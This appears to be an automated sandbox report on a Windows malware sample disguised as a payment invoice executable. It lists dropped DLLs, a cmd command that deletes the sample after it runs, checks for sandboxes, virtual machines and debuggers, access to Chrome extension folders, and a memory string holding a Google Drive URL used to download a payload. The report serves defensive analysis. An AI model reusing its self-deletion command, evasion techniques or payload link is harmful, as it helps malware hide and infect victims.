Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=10SMU8PGAZ7U1KQK-AKSIAM6PSN2MMSZ4WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp, usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe RDTSC instruction interceptor: First address: 00000000022F9DDA second address: 00000000022F9DDA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, E2BA7CF5h 0x00000013 xor eax, DC8A25F1h 0x00000018 xor eax, 3427492Ch 0x0000001d xor eax, 0A171029h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FF2103A1C18h 0x0000002e jmp 00007FF2103A12FEh 0x00000030 test ch, dh 0x00000032 popad 0x00000033 test esi, 513A66FCh 0x00000039 call 00007FF2103A14C6h 0x0000003e lfence 0x00000041 rdtsc
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe RDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, E2BA7CF5h 0x00000013 xor eax, DC8A25F1h 0x00000018 xor eax, 3427492Ch 0x0000001d xor eax, 0A171029h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FF2103A1BC8h 0x0000002e jmp 00007FF2103A12AEh 0x00000030 test ch, dh 0x00000032 popad 0x00000033 test esi, 513A66FCh 0x00000039 call 00007FF2103A1476h 0x0000003e lfence 0x00000041 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 6980 Thread sleep count: 90 > 30
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\libEGL.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldap60.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\freebl3.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldif60.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\qipcap.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\IA2Marshal.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\softokn3.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssdbm3.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssckbi.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleHandler.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\breakpadinjector.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\lgpllibs.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\prldap60.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-namedpipe-l1-1-0.dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9CE4 rdtsc 0_2_022F9CE4
Is looking for software installed on the system
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp, usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9CE4 rdtsc 0_2_022F9CE4
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA848 mov eax, dword ptr fs:[00000030h] 0_2_022FA848
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0E1E mov eax, dword ptr fs:[00000030h] 0_2_022F0E1E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6AA7 mov eax, dword ptr fs:[00000030h] 0_2_022F6AA7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4748 mov eax, dword ptr fs:[00000030h] 0_2_022F4748
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9781 mov eax, dword ptr fs:[00000030h] 0_2_022F9781
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4794 mov eax, dword ptr fs:[00000030h] 0_2_022F4794
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4390 mov eax, dword ptr fs:[00000030h] 0_2_022F4390
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9069 mov eax, dword ptr fs:[00000030h] 0_2_022F9069
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA84A mov eax, dword ptr fs:[00000030h] 0_2_022FA84A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3997 mov eax, dword ptr fs:[00000030h] 0_2_022F3997
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7E91 NtWriteVirtualMemory,LdrInitializeThunk, 0_2_022F7E91
